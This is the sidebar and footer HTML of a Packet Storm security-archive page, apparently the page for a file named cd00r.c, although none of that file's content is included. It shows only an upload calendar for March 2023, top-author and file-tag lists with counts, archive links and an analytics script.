<ul><li class="none"><a href="/files/date/2023-03-12/">12</a><div class="stats"><div class="point"></div><div class="date">Mar 12th</div><div class="count">0 Files</div></div></li><li class="low"><a href="/files/date/2023-03-13/">13</a><div class="stats"><div class="point"></div><div class="date">Mar 13th</div><div class="count">10 Files</div></div></li><li class="low"><a href="/files/date/2023-03-14/">14</a><div class="stats"><div class="point"></div><div class="date">Mar 14th</div><div class="count">6 Files</div></div></li><li class="med"><a href="/files/date/2023-03-15/">15</a><div class="stats"><div class="point"></div><div class="date">Mar 15th</div><div class="count">17 Files</div></div></li><li class="med"><a href="/files/date/2023-03-16/">16</a><div class="stats"><div class="point"></div><div class="date">Mar 16th</div><div class="count">22 Files</div></div></li><li class="low today"><a href="/files/date/2023-03-17/">17</a><div class="stats"><div class="point"></div><div class="date">Mar 17th</div><div class="count">13 Files</div></div></li><li class="none"><a href="/files/date/2023-03-18/">18</a><div class="stats"><div class="point"></div><div class="date">Mar 18th</div><div class="count">0 Files</div></div></li></ul>
<ul><li class="none"><a href="/files/date/2023-03-19/">19</a><div class="stats"><div class="point"></div><div class="date">Mar 19th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-20/">20</a><div class="stats"><div class="point"></div><div class="date">Mar 20th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-21/">21</a><div class="stats"><div class="point"></div><div class="date">Mar 21st</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-22/">22</a><div class="stats"><div class="point"></div><div class="date">Mar 22nd</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-23/">23</a><div class="stats"><div class="point"></div><div class="date">Mar 23rd</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-24/">24</a><div class="stats"><div class="point"></div><div class="date">Mar 24th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-25/">25</a><div class="stats"><div class="point"></div><div class="date">Mar 25th</div><div class="count">0 Files</div></div></li></ul>
<ul><li class="none"><a href="/files/date/2023-03-26/">26</a><div class="stats"><div class="point"></div><div class="date">Mar 26th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-27/">27</a><div class="stats"><div class="point"></div><div class="date">Mar 27th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-28/">28</a><div class="stats"><div class="point"></div><div class="date">Mar 28th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-29/">29</a><div class="stats"><div class="point"></div><div class="date">Mar 29th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-30/">30</a><div class="stats"><div class="point"></div><div class="date">Mar 30th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2023-03-31/">31</a><div class="stats"><div class="point"></div><div class="date">Mar 31st</div><div class="count">0 Files</div></div></li><li></li></ul>
</form></div>
<div id="mn-top-author" class="top-ten">
<h2>Top Authors In Last 30 Days</h2>
<ul>
<li><a href="/files/authors/4676">Red Hat</a> <span>150 files</span></li>
<li><a href="/files/authors/3695">Ubuntu</a> <span>108 files</span></li>
<li><a href="/files/authors/2821">Debian</a> <span>29 files</span></li>
<li><a href="/files/authors/5960">LiquidWorm</a> <span>10 files</span></li>
<li><a href="/files/authors/11596">Google Security Research</a> <span>9 files</span></li>
<li><a href="/files/authors/16531">Muhammad Navaid Zafar Ansari</a> <span>7 files</span></li>
<li><a href="/files/authors/7697">indoushka</a> <span>6 files</span></li>
<li><a href="/files/authors/14758">nu11secur1ty</a> <span>5 files</span></li>
<li><a href="/files/authors/16536">fearzzzz</a> <span>5 files</span></li>
<li><a href="/files/authors/16527">Ahmed Ismail</a> <span>5 files</span></li>
</ul>
</div>
<div id="mn-tag-file"><h2>File Tags</h2><ul><li><a href="/files/tags/activex/">ActiveX</a> <span>(932)</span></li><li><a href="/files/tags/advisory/">Advisory</a> <span>(80,508)</span></li><li><a href="/files/tags/arbitrary/">Arbitrary</a> <span>(15,906)</span></li><li><a href="/files/tags/bbs/">BBS</a> <span>(2,859)</span></li><li><a href="/files/tags/bypass/">Bypass</a> <span>(1,648)</span></li><li><a href="/files/tags/cgi/">CGI</a> <span>(1,020)</span></li><li><a href="/files/tags/code_execution/">Code Execution</a> <span>(7,022)</span></li><li><a href="/files/tags/conference/">Conference</a> <span>(676)</span></li><li><a href="/files/tags/cracker/">Cracker</a> <span>(840)</span></li><li><a href="/files/tags/csrf/">CSRF</a> <span>(3,305)</span></li><li><a href="/files/tags/denial_of_service/">DoS</a> <span>(22,906)</span></li><li><a href="/files/tags/encryption/">Encryption</a> <span>(2,358)</span></li><li><a href="/files/tags/exploit/">Exploit</a> <span>(50,635)</span></li><li><a href="/files/tags/file_inclusion/">File Inclusion</a> <span>(4,177)</span></li><li><a href="/files/tags/file_upload/">File Upload</a> <span>(950)</span></li><li><a href="/files/tags/firewall/">Firewall</a> <span>(821)</span></li><li><a href="/files/tags/info_disclosure/">Info Disclosure</a> <span>(2,684)</span></li><li><a href="/files/tags/intrusion_detection/">Intrusion Detection</a> <span>(876)</span></li><li><a href="/files/tags/java/">Java</a> <span>(2,957)</span></li><li><a href="/files/tags/javascript/">JavaScript</a> <span>(830)</span></li><li><a href="/files/tags/kernel/">Kernel</a> <span>(6,436)</span></li><li><a href="/files/tags/local/">Local</a> <span>(14,287)</span></li><li><a href="/files/tags/magazine/">Magazine</a> <span>(586)</span></li><li><a href="/files/tags/overflow/">Overflow</a> <span>(12,528)</span></li><li><a href="/files/tags/perl/">Perl</a> <span>(1,419)</span></li><li><a href="/files/tags/php/">PHP</a> <span>(5,110)</span></li><li><a href="/files/tags/proof_of_concept/">Proof of Concept</a> <span>(2,297)</span></li><li><a href="/files/tags/protocol/">Protocol</a> <span>(3,491)</span></li><li><a href="/files/tags/python/">Python</a> <span>(1,485)</span></li><li><a href="/files/tags/remote/">Remote</a> <span>(30,245)</span></li><li><a href="/files/tags/root/">Root</a> <span>(3,530)</span></li><li><a href="/files/tags/rootkit/">Rootkit</a> <span>(502)</span></li><li><a href="/files/tags/ruby/">Ruby</a> <span>(601)</span></li><li><a href="/files/tags/scanner/">Scanner</a> <span>(1,633)</span></li><li><a href="/files/tags/tool/">Security Tool</a> <span>(7,821)</span></li><li><a href="/files/tags/shell/">Shell</a> <span>(3,129)</span></li><li><a href="/files/tags/shellcode/">Shellcode</a> <span>(1,206)</span></li><li><a href="/files/tags/sniffer/">Sniffer</a> <span>(890)</span></li><li><a href="/files/tags/spoof/">Spoof</a> <span>(2,181)</span></li><li><a href="/files/tags/sql_injection/">SQL Injection</a> <span>(16,158)</span></li><li><a href="/files/tags/tcp/">TCP</a> <span>(2,383)</span></li><li><a href="/files/tags/trojan/">Trojan</a> <span>(687)</span></li><li><a href="/files/tags/udp/">UDP</a> <span>(880)</span></li><li><a href="/files/tags/virus/">Virus</a> <span>(663)</span></li><li><a href="/files/tags/vulnerability/">Vulnerability</a> <span>(31,347)</span></li><li><a href="/files/tags/web/">Web</a> <span>(9,451)</span></li><li><a href="/files/tags/paper/">Whitepaper</a> <span>(3,739)</span></li><li><a href="/files/tags/x86/">x86</a> <span>(946)</span></li><li><a href="/files/tags/xss/">XSS</a> <span>(17,559)</span></li><li><a href="/files/tags/">Other</a></li></ul></div><div id="mn-arch-file"><h2>File Archives</h2><ul><li><a href="/files/date/2023-03/">March 2023</a></li><li><a href="/files/date/2023-02/">February 2023</a></li><li><a href="/files/date/2023-01/">January 2023</a></li><li><a href="/files/date/2022-12/">December 2022</a></li><li><a href="/files/date/2022-11/">November 2022</a></li><li><a href="/files/date/2022-10/">October 2022</a></li><li><a href="/files/date/2022-09/">September 2022</a></li><li><a href="/files/date/2022-08/">August 2022</a></li><li><a href="/files/date/2022-07/">July 2022</a></li><li><a href="/files/date/2022-06/">June 2022</a></li><li><a href="/files/date/2022-05/">May 2022</a></li><li><a href="/files/date/2022-04/">April 2022</a></li><li><a href="/files/date/">Older</a></li></ul></div><div id="mn-os-file"><h2>Systems</h2><ul><li><a href="/files/os/aix/">AIX</a> <span>(426)</span></li><li><a href="/files/os/apple/">Apple</a> <span>(1,951)</span></li><li><a href="/files/os/bsd/">BSD</a> <span>(370)</span></li><li><a href="/files/os/centos/">CentOS</a> <span>(55)</span></li><li><a href="/files/os/cisco/">Cisco</a> <span>(1,919)</span></li><li><a href="/files/os/debian/">Debian</a> <span>(6,710)</span></li><li><a href="/files/os/fedora/">Fedora</a> <span>(1,691)</span></li><li><a href="/files/os/freebsd/">FreeBSD</a> <span>(1,242)</span></li><li><a href="/files/os/gentoo/">Gentoo</a> <span>(4,288)</span></li><li><a href="/files/os/hpux/">HPUX</a> <span>(878)</span></li><li><a href="/files/os/ios/">iOS</a> <span>(338)</span></li><li><a href="/files/os/iphone/">iPhone</a> <span>(108)</span></li><li><a href="/files/os/irix/">IRIX</a> <span>(220)</span></li><li><a href="/files/os/juniper/">Juniper</a> <span>(67)</span></li><li><a href="/files/os/linux/">Linux</a> <span>(45,048)</span></li><li><a href="/files/os/osx/">Mac OS X</a> <span>(684)</span></li><li><a href="/files/os/mandriva/">Mandriva</a> <span>(3,105)</span></li><li><a href="/files/os/netbsd/">NetBSD</a> <span>(256)</span></li><li><a href="/files/os/openbsd/">OpenBSD</a> <span>(482)</span></li><li><a href="/files/os/redhat/">RedHat</a> <span>(12,869)</span></li><li><a href="/files/os/slackware/">Slackware</a> <span>(941)</span></li><li><a href="/files/os/solaris/">Solaris</a> <span>(1,609)</span></li><li><a href="/files/os/suse/">SUSE</a> <span>(1,444)</span></li><li><a href="/files/os/ubuntu/">Ubuntu</a> <span>(8,425)</span></li><li><a href="/files/os/unix/">UNIX</a> <span>(9,205)</span></li><li><a href="/files/os/unixware/">UnixWare</a> <span>(185)</span></li><li><a href="/files/os/windows/">Windows</a> <span>(6,530)</span></li><li><a href="/files/os/">Other</a></li></ul></div>
      </div>

  </div>

</div>

<div id="f">
  <div id="fc">

    <div class="f-box" style="margin: 50px 0 0 0;">
        <a href="/"><img src="https://packetstatic.com/img1514015884/ps_logo.png" width="218" alt="packet storm" /></a>
    <p class="copy">&copy; 2022 Packet Storm. All rights reserved.</p>
    </div>

    <div class="f-box">
    <dl>
      <dt>Site Links</dt>
      <dd><a href="/news/date/">News by Month</a></dd>
      <dd><a href="/news/tags/">News Tags</a></dd>
      <dd><a href="/files/date/">Files by Month</a></dd>
      <dd><a href="/files/tags/">File Tags</a></dd>
      <dd><a href="/files/directory/">File Directory</a></dd>
    </dl>    
    </div>

    <div class="f-box">
    <dl>
      <dt>About Us</dt>
      <dd><a href="/about/">History &amp; Purpose</a></dd>
      <dd><a href="/contact/">Contact Information</a></dd>
      <dd><a href="/legal/tos.html">Terms of Service</a></dd>
      <dd><a href="/legal/privacy.html">Privacy Statement</a></dd>
      <dd><a href="/legal/copyright.html">Copyright Information</a></dd>
    </dl>
    </div>

    <div class="f-box">
	<dl>
      <dt>Services</dt>
      <dd><a href="/services/">Security Services</a></dd>
      <dt style="margin-top:1.5em;">Hosting By</dt>
      <dd><a href="http://www.rokasecurity.com/">Rokasec</a></dd>
    </dl>   
    </div>
    <div class="f-box">
    <ul class="f-follow">
     <li><a href="https://twitter.com/packet_storm"><img width="24" height="24" alt="Follow on Twitter" src="https://packetstatic.com/img1514015884/s_twitter.png" /> Follow us on Twitter</a></li>
     <li><a href="https://www.facebook.com/packetstormfeed"><img width="24" height="24" alt="Follow on Facebook" src="https://packetstatic.com/img1514015884/s_facebook.png" /> Follow us on Facebook</a></li>
     <li><a href="/feeds"><img width="24" height="24" alt="View RSS Feeds" src="https://packetstatic.com/img1514015884/s_rss.png" /> Subscribe to an RSS Feed</a></li>
    </ul>
    </div>

  </div>
</div>

<div id="o-box"><img src="https://packetstatic.com/img1514015884/o_close.png" alt="close" height="30" width="30" id="o-close" /><div id="o-main"></div></div>


<script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-18885198-1']); _gaq.push (['_gat._anonymizeIp']); _gaq.push(['_setDomainName', '.packetstormsecurity.com']); _gaq.push(['_trackPageview']); (function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.googleanalytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})(); </script><noscript><img src="https://ssl.google-analytics.com/__utm.gif?utmwv=1.3&amp;utmn=2402711746&amp;utmcs=ISO-8859-1&amp;utmsr=31337x31337&amp;utmsc=32-bit&amp;utmul=en-us&amp;utmje=0&amp;utmfl=-&amp;utmcn=1&amp;utmdt=cd00r.c%u2248%20Packet%20Storm&amp;utmhn=packetstormsecurity.com&amp;utmr=-&amp;utmp=%2Ffiles%2F22121%2Fcd00r.c.html&amp;utmac=UA-18885198-1&amp;utmcc=__utma%3D32867617.2402711746.1679067314.1679067314.1679067314.1%3B%2B__utmz%3D32867617.1679067314.1.1.utmccn%3D(direct)%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)" width="2" height="2" alt="" /></noscript>
<!-- Fri, 17 Mar 2023 15:35:14 GMT -->
</body>
</html>
